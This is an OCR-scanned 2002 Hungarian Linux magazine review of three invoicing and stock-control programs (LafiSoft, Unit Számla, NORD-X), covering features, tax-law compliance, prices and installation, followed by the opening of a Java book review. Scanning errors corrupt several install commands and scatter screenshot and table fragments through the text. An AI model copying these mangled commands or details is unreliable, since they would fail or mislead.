létre, amelyet egyszerre nyújtok át olvasóinknak abban a re- 
ményben, hogy sikerül felkelteni érdeklődésüket. A programok 
megtalálhatók az újság CD-mellékletén a Magzin/Szamlazok 
könyvtárban, tehát szabadon kipróbálhatók. 
Napjainkra a Linux operációs rendszer olyan mértékű fejlődé- 
sen ment keresztül, ami lehetővé tette, hogy grafikus felüle- 
tével bátran megjelenhessen irodai és otthoni környezetben. 
Megbízhatósága és testreszabhatósága évek óta bizonyítja 
jelenlétének szükségességét. Mindez ma már nemcsak a kiszol- 
gálók világában fontos, hanem mindennapi munkánk elenged- 


T erveim szerint egyetlen átfogó írást szerettem volna 


hetetlen követelménye is. Egy vállalat informatikai hátterének 
megtervezésében és finanszírozásában komoly szempontot 
jelent az ár/teljesítmény arány. Például egy mikrohálózatos 
irodai számítógéppatk kivitelezése mellett jelentős szerepet 
játszik az átgondolt és költséghatékony programgazdálkodás. 
A programok ára egyetlen számítógépre kivetítve sok esetben 
meghaladja a számítógép árát, ezért a szűkös költségvetés 
miatt sokszor a minőség rovására faragnak le a kiadásokból. 
Ebben is kitűnő lehetőségeket nyújt a Linux, hiszen egy-egy 
terjesztés több száz vagy ezer segédprogramot, úgymint szö- 
vegszerkesztőket, táblázatkezelőket, feladatütemezőket, bemu- 
tatókészítőket tartalmaz. 

A Linux-rendszerek talán egyik legnagyobb hiányossága, hogy 
a környezetükben futó, szakmai jellegű, magyar nyelvű felhasz- 
nálói programokhoz igen csekély mértékben kapcsolhatók, 
ezért igen kevés Linux-alapú termékkel találkozhatunk a piacon. 
A számlázás - esetleg a raktárkészlet-nyilvántartással egybe- 
kötve - rendkívül fontos ahhoz, hogy kedvenc rendszerünk 

az internetes, a hálózati és az asztali felhasználáson túl minden 
vállalkozásban joggal helyet követeljen magának. 

A programokat megjelenésük sorrendjében vizsgáltam meg. 

Az egyenlő esély megteremtése érdekében egy olyan Linux-ter- 
jesztést kellett keresnem, amely mind a három terméknek meg- 
felel, így a SuSE 8.0-ra és aa KDE2 grafikus környezetre esett 


1. táblázat A program jellemzői 


Megvalósított bizonylatos anyagmozgások: 
Fő törzsadat-táblázatállomány: 

A program fő jellemzői: 

A számlázáskor felhasználható papírtípus: 
Kedvezményrendszer: 

Az eladási ár képzése: 


A program áfarendszere: 


Beszerzés, értékesítés számlával, ajánlatadás, kiadás szállítólevéllel, nyugtás eladás 
Anyagtörzs-raktárkészlet, vevők, beszállítók 

Gyors, egyszerű kezelés, megbízható működés 

Sorszámozott leporelló vagy A4-es méretű papír 

Vevőfüggő, százalékos 0999 között, anyagtételenként módosítható 

Egyedileg beírható, utolsó beszerzési árból szorzóval hozható létre 


Nettó egységáras, kulcs alapján önműködően rászámolt áfa 


(0, 12, 259-os kulcsok) 


A programban kezelt árak: 
Bejegyzési díj (egyszeri): 20 000 Ft 


Felhasználási terület: 


súlyozott nyilvántartási, max. beszerzési, utolsó beszerzési, egyedi eladási 


Bolti kiskereskedelmi, kisvállalkozások számlázási, készletkezelési 


feladatainak ellátására 


Bejegyzéskötelezettség: 
Linux-rendszerváltozatok, amelyeken 
a program már működőképes 

(a legrégebbi változatszámok) 
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100 kiállított bizonylat vagy 3 milliós forgalmazás felett egyszeri alkalommal 
Mandrake 8.0, SuSE 7.0, Debian Potato r 2.2 (-- glibc update), RedHat 7.0 





2. táblázat Jellemző adatok 


Értelmezés Legnagyobb Hatékonyság 
Cikktörzs, 100 000 2000 

raktár tételszáma 

szállítók és 100 000 

vevők száma 


Bizonylatok száma 100 000/év 1000/év 


Az árak tizedes pontossága: 2 tizedes 
Egy évben kiállítható bizonylatok száma: 100 000 db 


Egy bizonylat egy sorában kezelhető maximális összeg: 99 millió Ft 


Raktárkészlet-mennyiség tizedesek száma: 2 tizedes 


Lehetséges eladási árak: egy adat, 9 egész 2 tizedes 


3. táblázat Fő jellemzők és ügyviteli folyamatok 


Naprakész anyakarton-vezetés Önműködő évváltás, 


sorszám-, számlaszám-újraindítás 


Egy számlán az áfa keverhető 


Adatok mentése, visszatöltése 
Adathiba-javító algoritmusok 


súlyozott elszámolói árképzés 


Többoldalas (áthozat-átvitel) 
számlakészítési lehetőség 


Minden nyomtatás 
átirányítható képernyőre 


A bizonylatok utólagos, 
tartalmi módosítási lehetősége 
(kivétel ez alól a lezárt, 

azaz kinyomtatott számla) 


csökkenti-e a készletet 


Önműködő évváltás és 
számlaszám sorszám-újraindítás 
Teljes anyagmozgás bizonylatolt 
rendszerű, ebből következően 
visszamenőlegesen is 
ellenőrizhető, felügyelhető 


szállítólevéllel történhet 


Vonalkódolvasó kezelése 
(emulált billentyűzet) 


a választásom. lermészetesen ez nem azt jelenti, hogy más 
terjesztésen nem működnek, vagy hogy például a Debian 
GNU/Linux változat ne létezne némelyik cég kínálatában, sőt! 
Értesüléseim szerint a Nordlandia Kft. már készíti az UHU- 
linuxos változatát is. Lássuk, mit is tud ez a három termék! 


LafiSoft 


A LafiSoft adatbázis-kezelő felhasználói programokat fejleszt, 
elsősorban Windows környezetben. Szakterületébe a raktár- 
készlet-nyilvántartó és számlázóprogramok készítése tartozik 
— egyedi igények szerint. A tízéves folyamatos fejlesztési tevé- 
kenység alatt a feladat mind jobb minőségű megoldása érde- 
kében előbb a Clipper 5.2d, később a Delphi 2.0 fejlesztői rend- 
szerekben kódolt alprogramok működtek. Jellemzően kis- és 
középvállalkozások, vállalatok igényeit kívánja kielégíteni, 
megfizethető áron, kifejezetten haszonelvű adatmodulokkal. 
A programmegvalósítás során minden esetben a megrendelő 
egyedi igényei a meghatározóak. 

2002. szeptember 7-én látott napvilágot a raktárkészlet-kezelő 
és számlázóprogram 2.0.0-s linuxos változata, ami egy hálózati 
munkára alkalmas, Xbase adatbázismotorra épülő nagyteljesít- 
ményű változat. A program bejegyzési díja 40 000 forint -- áfa, 
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A számlakészítéskor megadható, 
hogy a kiadott számla tartalma 





Teljesen egyenrangú programvezérlés 
egérrel és billentyűzettel 


Anyagkiadás számlával vagy 





Évfüggetlen folyamatos üzem 


Külső vevők-eladók, anyagtörzs-átalakítási 
lehetőség DBF-ből 


A számlára logó helyezhető 


A bizonylatok tartalma egymásba emelhető 


Be- és kimenő bizonylatok áfaelemzése 


A program indítása tetszés szerinti sorszámtól 
történhet, segítve a régi számlázóprogramról 
történő átállást évközben 


Telefonos, e-mail szaktanácsadás, díjtalan 
programfrissítés, tájékoztatás 


Az anyagbevétel bizonylatolt, egyeztethető 
a kapott számlával 


Kézi nyugtás eladások kezelése 
(fejlesztés alatt) 


de száz kiadott bizonylat és hárommillió forint forgalom alatt 

a program szabadon, díjtalanul használható. A program nincs 
korlátozva. A századik bizonylat elérése után minden új 
bizonylat kiállításakor egy bejegyzésre figyelmeztető üzenet 
jelenik meg, majd egyperces várakozási ciklus következik. 

A program megfelel a (24/1995 (XI.22) PM-rendelet) szigorú 
számadású bizonylatokról szóló törvényi előírásoknak, vala- 
mint az ezt módosító 34/1999.(XII.26.) PM-rendeletnek, azaz 
kihagyás és ismétlés nélkül biztosítja a folyamatos számlaszám- 
képzést, a másolatokkal való hiánytalan elszámolást, a számla 
összes példányának egymás utáni nyomtatással történő elő- 
állítása esetén gondoskodik a példányok sorszámozásáról. 
löbbpéldányos, előnyomás nélküli számla esetén feltüntethető, 
hogy a számla hány példányban készült, az eredeti példány a 
gépi program által megkülönböztethető, a lezárt számlákban 
módosítás már nem végezhető. A 8/1999. (III.15.) PM-rendeletet 
módosító 8/2000. (II.16) PM-rendeletnek az általános forgalmi 
adóról szóló 1991. évi LXXIV. tv. 13.§ (1) bekezdése 16. pontjá- 
nak j), 1) és m) pontja a számla kötelező tartalmi elemeiről szól, 
miszerint a számlában termékfajtánként, szolgáltatásfajtánként 
kell az adó alapját, a felszámított áfát és az adóval növelt ellen- 
értéket kimutatni. Az áfatörvény 44.§ (1) bekezdése a törvény 


2002. november 15 


mh [Om 


O Kiskapu Kft. Minden Jog fenntartva 


0 Kiskapu Kft. Minden Jog fenntartva 





Alaplap pentum ii 
Alaplap PIll Celeron 
Kalap cs 0.5 kg 
Kalapácsnyél 

M2 horganyzott anya 


HE 


proba sor 


2 
8 


elele be 
idot 





13.§-ában megfogalmazott követelményein túl további, az adó 
mértéke (áfakulcsa) szerinti összesítést is előír az adó alapjára, 
illetve az összegének a feltüntetésére vonatkozóan. 

Az 1990. évi XCL. sz.tv 68 (3) bek. az adózás módjának törvé- 
nyében foglaltaknak, a 1992. évi LXXIV. tv 718. (5) az áfatör- 
vényben foglalt követelményeknek, az 1992. évi LXXIVitv. 13.§ 
(1) bekezdésének 16., 17., 18. és a 20. pontja (16.m.) részében 
foglalt módosításoknak, az 1997. évi CII.tv. 67. §-a, 71. §-a és 
72.§-ában foglaltaknak a program megfelel. 


Általános leírás és telepítési útmutató 
A program alapja: az Általános számlázó program for Windows 
ügyviteli program 3.0.15 változata. Ez az alaprendszer került átí- 
rásra a program forráskódjának felének újraírásával, alkalmaz- 
kodva a Linux operációs rendszer adta lehetőségekhez és azok ki- 
aknázásához. A program tetszés szerinti könyvtárba telepíthető. 
1. Nyisson egy terminálablakot. 
2. Készítsen egy alkönyvtárat amely a /home könyvtárából 
nyílik. A neve tetszés szerinti lehet, például lafisoft: 
mkdir lafisoft 
3. Lépjen be az újonnan létrehozott könyvtárba: 
cd lafisoft 
4. Másolja be a CD-n található tar.gz állományt: 
cp /cdrom/ szamlazok/ 
es]latrisOott raktar net 2.0.0.1386.tar.gz 
5. Bontsa ki a tömörített állományt: 
tar -xvzt lafisóft raktar net 2.0.0. 
ei 386. tar.gz 
6. Indítsa el a program telepítését a runme.sh segítségével: 
./runme.sh 


A program hálózati beüzemelése 

1. Telepítse fel a programot minden terminálgépre az előzők- 
ben leírt módon. 

2. Másolja be az egyik algép programkönyvtárát a kiszolgáló 
közös könyvtárába. 

3. Minden terminálon indítsa el a programot (runme.sh). 

4. A technikai programok Bejegyzés pontban, az utolsó fülhöz 
tartozó ablakban állítsa be a kiszolgáló célkönyvtárát (csak 
akkor sikerül, ha valóban létezik). 


Unit 

A Unit Kft. kis- és középvállalatok számára kínál elsősorban 
Windows-alapú, könnyen kezelhető, rugalmas, összevont 
ügyviteli rendszereket. 
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Javasolt a bittonsági mentés készítése mielőtt megváltoztatná az etadási árait 


9 Új egyságár automatikus ketakífésa egé 
9 Új egységár kerakítés nelküli 


9 Núm árdékes az 4FA 

9 Csak ahol 25 az ÉF, 
9 Csak ahol 1229 az AFi 
g Csak ahol 08 az ÁAF, 


1! 


kell a 


Árváltozás végrehajtása 


Szortó Út -: 5 f100 


01040 Raktár program 

01065 VGA kártya TSeng ET 6000 
01060 Winchester 20 GB guantum 7200 
01025 csapágy 

01070 hangkártya SB PCI 128 

01075 kiskfoppy drive 

01045 transzformator 


FT 16000,00 
FT 6000,00 
FT 35000,00 
FT 200,00 
FT 5600,00 
FT 3600,00 





Programjaikra jellemző a barátságos felhasználói felület, test- 
reszabhatóság, rugalmas kialakítás, valamint az egyszerűen, 
könnyen kezelhető megoldások, a százszázalékos jogszabály- 
megfeleltetés, a hálózati felhasználás; továbbá elektronikus 
kézikönyv is kapható hozzájuk. 

A program rendelkezik a megfelelő minősítésekkel, áfával 
növelt ára 9900 forint. 

A program géppigénye az alábbiak szerint alakul: 

IBM PC-megfelelő számítógép (Pentium), 64 MB RAM 
(ajánlott: 128, 256 MB), CD-ROM-meghajtó. 

A Unit Számla 1.1 célja, hogy a felhasználók egy egyszerű, csak 
lényegi szolgáltatásokat tartalmazó program segítségével gyor- 
san és hatékonyan tudjanak számlákat kiállítani. A UNIT 
Számla 1.1 számlázórendszer a kézi számlázás és számlanyil- 
vántartás mindenki által ismert gyötrelmes módjánál jóval 
hatékonyabb, áttekinthetőbb, egyszerűbb és nem utolsósorban 
látványosabb módszert kínál. 

Az alaprendszer biztosítja a számlákkal kapcsolatos adatok 
többéves időtartamra történő elkészítését, mentését és tárolását. 
A rendszer készítése során fő szempontként vették figyelembe 
a felhasználók munkájának minél hatékonyabb támogatását, az 
egyszerű kezelőfelület kialakítását, a program használatának 
mielőbbi elsajátíthatóságát. Bíznak abban, hogy a program 
alkalmazása segítséget nyújt bárkinek ilyen irányú ügyviteli 
tevékenysége pontos, egyszerű és gyors elvégzéséhez, szabad 
teret engedve az egyéb érdemi feladatok számára. 

A számlák gyorsan és pontosan elkészíthetők. Választhatunk 

a már korábban rögzített partnerek, cikkek vagy szolgáltatások 





Üdvözli a NORD-X telepítője! 
8z üzleti megoldás kis- és középvállalkozások 








A következőkben a NORD-X telepítője végigvezeti Önt 
a telepítési folyamat lépésein. 
A telepítés megkezdése előtt kérjük olvassa el 
epe; — figyelmesen a NORD-X felhasználói licencszerződésti 
; Ba (következő lépés) 
44 MS A telepítés a feltétetok elfogatása után folytatható! 











adatai közül. Így ugyanazt az adatot nem kell többször felvinni, 
hanem egyszetű kiválasztással kitölthetők a kívánt cikk-, illetve 
partnermezők. 

A kimenő számlák tételesen, napi, heti, illetve havi bontásban 
is összesíthetők, de akár az áfakulcsok szerint, sőt partneren- 
kénti bontásban is. 

A program telepítését és használatát SuSE Linux 7.2, 7.3, illetve 
8.0 változatok alatt próbálták ki. Az egyéb változatok alatti 
telepítés, illetve használat a felhasználó saját tudásán és tapasz- 
talatán kell alapuljon (a gyártó ehhez semmilyen támogatást 
nem ad és semmilyen felelősséget nem vállal). 


A program futtatásához az alábbi feltételek szükségesek 

e Linux operációs rendszer (SuSE Linux 7.2, 7.3, 8.0 válto- 
zatokra kipróbálva). 

e  X Window grafikus felület (KDE2 környezet ajánlott). 

e . Pentium vagy Pentium-megfelelő processzor (legalább 
200 MHz-es ajánlott). 

e Nyomtató (tintasugaras vagy lézer használata célszerű). 


A telepítés a következőképpen zajlik 

1. Jelentkezzen be egyszerűen felhasználóként (ne rendszer- 
gazdaként!). 

2. Adja ki terminálból vagy a fájlkezelőből a CD-n lévő 
install .sh parancsot. 

3. A telepítőprogram megkérdezi a rendszergazdai (root) 
jelszót, ezt adja meg! Ennek hatására elindul a telepítő, ami 
feltelepíti a programot, és a telepítést indító felhasználó 
asztalára helyezi a program indításához szükséges ikont. 
Amennyiben ezt más felhasználó számára is meg szeretnénk 
tenni, az adott felhasználónak el kell indítania a 
/opt/szamlalfujfelhasznalo programot. 

4. A telepítés végén megjelenik egy értesítés arról, hogy 
a telepítés sikeres volt. 


A rendszer futtatása KDE2 nélküli környezetben 

A programot KDE2 alatti használatra tervezték, de bármilyen 

más grafikus munkakörnyezetben is használható, mindössze 

három dolgot figyelembe kell venni: 

1. Telepítéskor az install.sh a kdesu nevű programot használja, 
hogy a telepítést akkor is el lehessen végezni, ha az illető 
nem rendszergazdaként indítja a telepítőt. Ha a KDE nincs 
telepítve, akkor rendszergazdaként, kézzel kell feltelepíteni 
a programot. Ezt konzol alól, parancssorban a következő 
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parancsok kiadásával tehetjük meg: 
fpom -i. InterBaseClS T1-V6.0-1L.13866.r1rpm 
s.-force --nodeps 
rpm -i unitszamla-1.1-1.1386.rpm --force 
s. -nodeps 

2. A program súgója a KDE segítségnyújtó rendszerét, a 
khelpcenter-t használja, a /opt/szamla/szamlahelp parancsfájl 
átírásával azonban bármelyik másik HIML megjelenítésére 
alkalmas programot is használhatjuk. 


Maga a parancsfájl számos előre meghatározott segítségmegje- 
lenítő környezetet tartalmaz, amit a sor előtt lévő kettős kereszt 
(7) karakter törlésével hozhatunk működésbe. 

Maga a parancsfájl így néz ki: 

H1:/bin/báash 

khelpcenter /opt/szamla/help/uniti1l.htm § 
tgnome-help-browser /opt/szamla/help/unit1.htm 
Hnetscape /opt/szamla/help/unitil.htm § 
Hmozilla file:/opt/szamla/help/uniti1.htm § 
topera /opt/szamla/help/uniti1.htm 

Hrxvt -e lynx /opt/szamla/help/unit1.htm 
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Ebből az első sorral nem kell foglalkoznunk, a többi sorban 
azonban a KDE Help, a Gnome Help, a Netscape, a Mozilla, 

az Opera, valamint a lynix karakteres böngészőt választhat- 
juk súgónak. Ha például Mozillát szeretnénk, tegyünk a 
khelpcenter elé egy kettős keresztet (7), a Mozilla előtt lévőt 
pedig töröljük ki. 

Ehhez rendszergazdaként kell bejelentkeznünk a rendszerbe, 
majd a kwrite vagy más szövegszerkesztő (X-terminál alatt 
például a vi vagy az mcedit) segítségével módosíthatjuk 

a /opt/szamla/szamlahelp parancsfájlt. 


Adatbázis-kezelés 

A program az Interbase 6.0 Open Editiont használja, ezt a 
telepítő parancsfájlt telepíti is. Ha ezen változtatni akar, például 
hálózatban kívánja használni az alkalmazást, akkor az adat- 
bázishoz kapcsolódás jellemző a /opt/szamla/unit.db prog- 
ramban találja. A program Interbase adatbázis-kezelőre készült, 
így más adatbázis-kezelőt nem képes használni (mivel 
nagymértékben használja az Interbase SOL -kiterjesztéseit). 


Telepítés Debian Woody GNU/Linux alatt 
A rendszer ugyan alapvetően RPM alapú SuSE-terjesztéshez 
készült, de például Debian alá is telepíthető. Ebben az alien 
nevű csomag segíthet. A telepítés menete a következő: 
1. Másolja a két RPM-csomagot egy olyan könyvtárba, ahol 
írási joggal rendelkezik. 
2. Nyisson egy X terminált (rendszergazdai joggal), lépjen 
be a könyvtárba, és adja ki a következő parancsot: 
alien -i unitszamla-1.1-1.1386.rpm 
3. Hozzon létre egy közvetett hivatkozás a /usr/lib alatt: 
in -§ libetde44t-libe6S.1-2.860.3 
9 ibetderr-libőe6. 1-1. 80.2 
4. lelepítse fel az Interbase adatbázis-kezelőt a következő 
parancs segítségével: 
alién -1 InterBasetS L1-V6.Ú0-1.1386.£6M 
Ezzel a telepítés tulajdonképpen kész is van. 


A futtatáshoz azonban az alábbi két feltételt még teljesíteni kell 

1. az LC ALL környezeti változónak magyarnak (hu) kell 
lennie. 

2. a Jopt/interbase/bin/gds lock mgr programnak futnia kell. 
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Unit számla V 1.1 


Kiadja és forgalmazza: 


T3A TI TT 
GTV EE 


UNIT KFT. Budapest, 1034 Kenyeres u. 28 
Telefor/F ax; 388-7317 

e-mail; infod unit.hu, Internet; www.unit.hu 
Ügyfélszolgálat: UNIT KFT,, Tel. 388-7317, 250-0889 


Figyelmeztetés: Ezt a számítógép programot a szerzői jogi törvény védi, 
A programnak vagy bármely részének felhatalmazás nélküli másolása 
vagy terjesztése súlyos polgári vagy büntetőjogi következményekkel 
járhat, Az ilyen visszaéléseket a törvény bünteti, 

Fejlesztették: 


Goda Attila (xsoftígtelantívnethü) 
Frech Miklós (xiensiomöaxelero hu) 





Nordlandia 

A Nordlandia Számítástechnikai Kereskedő és Szolgáltató Kft. 
2000 októberében alakult meg a Computer Klinika magánvál- 
lalkozás folytatásaként, amely DOS- és Windows-felületre 
fejlesztett programokat, egyéni megrendelések alapján. A cég 
soltvadkerti illetőségű. A Computer Klinika 1997 végén jött 
létre, és számos programot készített, többek között bérszám- 
fejtő, számlázó- és készletnyilvántartó rendszert, könyvtári 
nyilvántartó programot, árajánlatkészítőt, illetve műanyag- 
üzemek számára hasznos hálózatos munkafolyamat-kezelő 
rendszert fejlesztett ki. Ezen túl munkaügyi tevékenységeket 
nyilvántartó programot készített a Bács-Kiskun megyei Munka- 
ügyi Központnak, valamint egy adatösszevonó keretprogramot 
egy amerikai katalógusközlő cég számára. A Nordlandia Kft. 

a fenti főbb irányelveket hivatott továbbvinni. A Linux roha- 
mos fejlődése ösztönzően hatott, így eddig megszerzett tapasz- 
talataikat egy új irányvonal mentén kamatoztatják, és meg- 
próbálják a Linux előnyeivel ötvözni. Úgy látják, hogy a meg- 
bízható operációs rendszerre épülő programok jelenthetik 

a számítástechnika jövőjét. Ennek a törekvésnek az irányába 
szánt első lépésük a NORD-X készletnyilvántartó és számlázó- 
rendszer megalkotása volt. 

A Nordlandia Kft. 2001 áprilisában kezdett el Linuxon fejlesz- 
teni egy teljes, moduláris felépítésű készletnyilvántartó és 
számlázórendszert, amely a NORD-X nevet kapta. 15 hónapos 
fejlesztés után 2002. szeptember 12-én készült el a program 
második próbaváltozata. 

A program fejlesztése során az volt a cél, hogy olyan rendszer 
készüljön el, amely szolgáltatásaiban, minőségében és kezelhe- 
tőségében felveszi a versenyt a Windows piacán jelenlévő 
vezető ügyviteli programokkal. 

A program szerteágazó készletnyilvántartást vezet, amely 

a készlet teljes mozgását a raktárba érkezés pillanatától a kia- 
dásig zárt rendszerben nyomon követi. A számlázással kap- 
csolatos összes szolgáltatás pedig összekapcsolódik a készlet- 
kezeléssel, valamint egy teljes körű pénzügyi kimutatási rend- 
szerrel (átutalások, egyenlegek kezelése stb.). A NORD-X több 
felhasználót is képes kezelni, méghozzá testreszabható jogosult- 
ságokkal. Ezenfelül számos olyan egyedi szolgáltatást is igyek- 
szik megvalósítani, amelyek jelenleg egyetlen ilyen jellegű 
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programban sem találhatóak meg. Ilyen például a programba 
épített üzleti számológép és az üzleti határidőnapló, valamint 

a jegyzettömb. A program eseménynaplója pedig minden 
tevékenységet felhasználók szerint csoportosítva rögzít, és a 
különféle szűrési feltételek segítségével a teljes tevékenységi 
rendszer áttekinthetőségét könnyíti meg. Számos, a pénzügyi 
terv teljesítését elősegítő és megvalósító szolgáltatás mellett 
olyan eszközök is támogatják a felhasználók munkáját, mint 
például az árajánlatok, a megrendelések rögzítése, a számlák 
mentése, számlasablonok készítése. A program bármely pilla- 
natban és tetszőleges időszakra vonatkozóan is pontos képet ad 
a készlet mennyiségéről, pillanatnyi értékéről, a megrendelt 
tételekről, és számos más pénzügyi szempontból fontos adatról. 
A program képes az egyéb jellegű bejövő számlák kezelésére, 
ezáltal a felhasználó pontos képet kaphat vállalkozásának pénz- 
ügyi helyzetéről. A program fejlesztése során fontos szempont 
volt a látványos, de nem bonyolult, mindemellett következetes, 
átlátható és felhasználóbarát kezelőfelület megvalósítása is. 

A piaci megjelenést kereskedelmi termék formájában ez év 
végére tervezik. A program kipróbálását SuSE Linux 7.2-es 
vagy 7.3-as, illetve 8.0-s terjesztésen javasolják, ugyanis ezek 
alatt a rendszerek alatt fejlesztették és próbálták ki. Más Linux- 
változatok alatt nem próbálták ki a programot, a működés 
alapfeltétele elvileg a KDE 2.x grafikus felület, de a KDE 3-as 
javítások is elkészültek már. 

Kezelőfelülete igazodik a korszerű grafikus környezetek elvárá- 
saihoz. A beépített segítségközpont használatával pontos képet 








kaphatunk a program szolgáltatásairól keresési lehetőségekkel, 
továbbá hivatkozásra léptetéssel egyéb részletekről olvasha- 
tunk. A program jelenlegi változata többfelhasználós, úgyne- 
vezett asztali — azaz egy számítógépen futó - alkalmazás. 

A későbbiekben tervezik a rendszer hálózatos változatának 
kivitelezését is. 

A program telepítése az előzőekhez képest kicsit túlbonyolított- 
nak tűnik (de kárpótol érte szolgáltatásainak széles köre), grafi- 
kus felületű, amely minden szükséges lépést elvégez a program 
használatának megkezdése előtt. A felhasználónak nincs más 
dolga, mint elindítani a telepítőprogramot és követni a lépéseket. 
A program grafikus felülete könnyen és hatékonyan kezelhető 
környezetet biztosít a felhasználó számára, amelynek haszná- 
lata következetes felépítésének köszönhetően gyorsan elsajá- 
títható. Az adatok a könnyű áttekinthetőség érdekében külön- 
féle szempontok szerint szűrhetők és rendezhetők. 


Mit nyújt a program? 

A törzsadatok testreszabhatósága megkönnyíti az esetleges 
adatváltozások kezelését. Partnereink minden fontosabb adatát 
tárolhatjuk, így egy elektronikus levél küldése is könnyedén 
végrehajtható. A termékek és szolgáltatások csoportokba, szük- 
ség esetén alcsoportokba sorolhatók, jól szerkesztett cikkrend- 
szert építhetünk fel. Később helyzetük egy menüpont segítsé- 
gével bármikor megváltoztatható. Ilermékek esetében árkalku- 
lációs ablak segíti a felhasználót az alapegységár kiszámításá- 
ban. Lehetőség nyílik pénznemek felvitelére, amely valutás 
számlák elkészítéséhez ad segítséget. A beépített irányítószám- 
és település-adatbázis pedig szükség esetén bővíthető, csakúgy, 
mint az egyesített VISZ jegyzékgyűjtemény. 

A készletmodul minden olyan raktárkészlet kezelésével 
kapcsolatos szolgáltatást tartalmaz, ami az árumozgást napra 
készen vezeti. Így tudunk bejövő és kimenő raktárbizonylatot 
vagy szállítólevelet készíteni, róluk számlát kiállítani, termé- 
keink között tallózni, a téves rögzítéseket javítani és a raktár- 
készletet felügyelni. A begyűjtött adatok alapján pontos képet 
kaphatunk fogyó, netalán elfogyott termékeinkről, valamint 

a megrendelt áruk mennyiségét is nyomon követhetjük. 

A számlázó modul többek között készpénzes, átutalásos és 
egyéb számlák készítésére, sztornózására, helyesbítésére, máso- 
lására és megkettőzésére ad lehetőséget. Rendeléseket, áraján- 
latokat és számlasablonokat vehetünk fel, amik alapján a ké- 
sőbbiek folyamán bármikor számlát. Ezzel rendszeres vásár- 
lóinkat gyorsan kiszolgálhatjuk. Az eladási árak változásainak 
nyomon követésére is lehetőségünk van, továbbá rögzíthetjük 
a vállalatunkba beérkező számlákat, így kiadásainkról is pon- 
tosabb képet kaphatunk. 

Az egyenlegkezelés modul nyilvántartja az átutalásos számlák 
kiegyenlítésének minden mozzanatát, illetve a hátralékkal 
rendelkező vevőink pillanatnyi egyenlegét. A fizetési határidőt 
túllépett számlákra igény esetén a program a megadott mérték- 
ben kamatot számol fel. Az ilyen jellegű számlák esetében a 
partnerek számára tájékoztató levelet tudunk nyomtatni a tar- 
tozás összegéről, amelyet akár elektronikus levélben is elküld- 
hetünk. A kintlevőségeket nyomon követhetjük, részlegesen 
átutalt számlákat sztornózás esetén visszautalhatjuk, így a 
nyilvántartás pontos marad. 

A kimutatás modul tartalmazza az áfa-befizetési és -vissza- 
igénylési értékek megjelenítését, egy pénzügyi mérleget, amely 
a programban felvitt adatok alapján ad felvilágosítást pénzügyi 
helyzetünkről. A leltár segítségével a készlet bármelyik nap 
szerinti állapotát lekérdezhetjük, megfelelő mennyiségű adat 
birtokában pedig grafikonos kimutatást is kaphatunk. Ezen 
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kívül számos más listát készíthetünk, amelyek segítségével 

minden tranzakció pontosan nyomon követhető. 

Az egyéb menüpontok segítségével számos más, a munka 

megkönnyítését, átláthatóságát növelő szolgáltatást használ- 

hatunk. Ezek között található a program felhasználóinak 
felügyeletét irányító ablak, amellyel a rendszer felhasználóit 
különböző jogkörökkel ruházhatjuk fel. A felhasználók külön- 
külön, ízlésük szerint testreszabhatják az eszköztárakon elhe- 
lyezett, a menüpontok gyors elérését segítő gombok látható- 
ságát és egyéb tulajdonságait, beállíthatják a táblázatok oszlo- 
painak háttér- és betűszínét. Itt tudhatjuk meg az általunk 
választott díjcsomag pillanatnyi bejegyzési adatait, végezhe- 
tünk díjcsomag-módosítást, változtathatunk cégünk adatain, 
megadhatunk számlaszám-formátumot és a bizonylatokra 
nyomtatandó céglogót is. Új tárgyév kezdete előtt a pillanatnyi 
évet lezárhatjuk, a benne található összes adat megtekintésé- 
hez a későbbi évek folyamán pedig bármikor visszatérhetünk. 

Ugyanitt adatainkról igény szerinti gyakorisággal biztonsági 

mentés készíthető. 

Az Extrák modul négy, a mindennapi munkát segítő hasznos 

lehetőséget tartalmaz. 

1. A határidőnapló olyan különféle emlékeztetők bejegyzésére 
alkalmas, amelyeket órákhoz és percekhez igazíthatunk. 

A pontos dátumok kereséséhez egy öröknaptár nyújt se- 
gítséget. A bejegyzések lehetnek magánjellegűek (csak a 
bejegyzést rögzítő felhasználó láthatja) vagy nyilvánosak, 
mindkettőre az általunk megadott napon akár emlékeztetőt 
is kérhetünk. 

2. Az üzleti számológép, mint neve is mutatja, nem csupán 
matematikai alapműveletek elvégzésére szolgál. Külön kezeli 
a beviteli és az eredmény mezőt, két memóriarekesszel is 
rendelkezik, az értékek számításához általános kerekítési 
mértéket lehet megadni. Legfőképpen a szokványos 12 és 
25 százalékos forgalmi adóval kapcsolatos műveletek lehet- 
nek számunkra fontosak, amelyek lehetőséget adnak nettó, 
bruttó- és áfa-bontásra, a kapott értékekkel pedig további 
hasznos műveletek végezhetők. 

3. A jegyzetlapok a pillanatnyi felhasználóval rövid megjegy- 
zések tárolására kínálnak lehetőséget. 

4. Az egeménynapló gyakorlatilag minden műveletet percre 
pontosan rögzít. Az esemény rövid megnevezése mellett 
részletes leírást kaphatunk az adott cselekmény lefolytatá- 
sáról. Így a későbbiek folyamán megtudhatjuk, hogy melyik 
felhasználó mikor és milyen műveletet hajtott végre. Módo- 
sítások esetén a módosított elem korábbi értéke is leolvas- 
ható. Ezáltal nemcsak mások, de a saját munkánkat is 
könnyen ellenőrizhetővé tehetjük, így az esetleges hibák 
könnyen megtalálhatók és javíthatók. 


A program gépigénye 

IBM PC-megfelelő számítógép (Intel Pentium, AMD, Cyrix, 
IBM), 64 MB memória (ajánlott: 128 MB), CD-ROM-meghajtó, 
300 x 600-as felbontás (ajánlott: 1024 x 768). 


E három linuxos termék bizonyítja, hogy szerencsére van 
elmozdulás a hazai linuxos ügyviteli programpiacon. 


Gibizer Tibor 

(gibzo(olinuxmania.hu) 

újságíró, Immár hét éve a Linux elkötelezett 
híve. Imádja a kutyákat, a kerékpározást és 
az autós csavargást. 
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Konyvajánló 


J2EE-útikalauz Java-programozóknak. 


z első nyilvános Java-változat, az 1.0 utáni 1.1-es már 
AA általánosan jól használható volt. Ezeket sorban kö- 
vették a többiek, jelenleg az 1.4-esnél tartunk. A nyelv 

maga nem sokat változott, de a futtatásra szolgáló virtuális 

gépek igen, és a szabványos könyvtárak újabb és újabb alkal- 

mazás: területeket ölelnek fel. A fejlődéssel egy-két elnevezés 

és a csomagolás is megváltozott. Az 1.2-es változat óta (1.3, 1.4) 

a felület neve - kissé félrevezetően - Java 2. A felületfüggetlen 

bájtkódok futtatásra szolgáló környezet neve volt és maradt 

JRE (Java Runtime Environment), míg a fejlesztőkészletek neve 

JDK (Java Development Kit) helyett immár SDK (Software 

Development Kit). 

A Java 2 három fő részből áll: 

e . Java 2 Platform, Micro Edition (J2ME). 
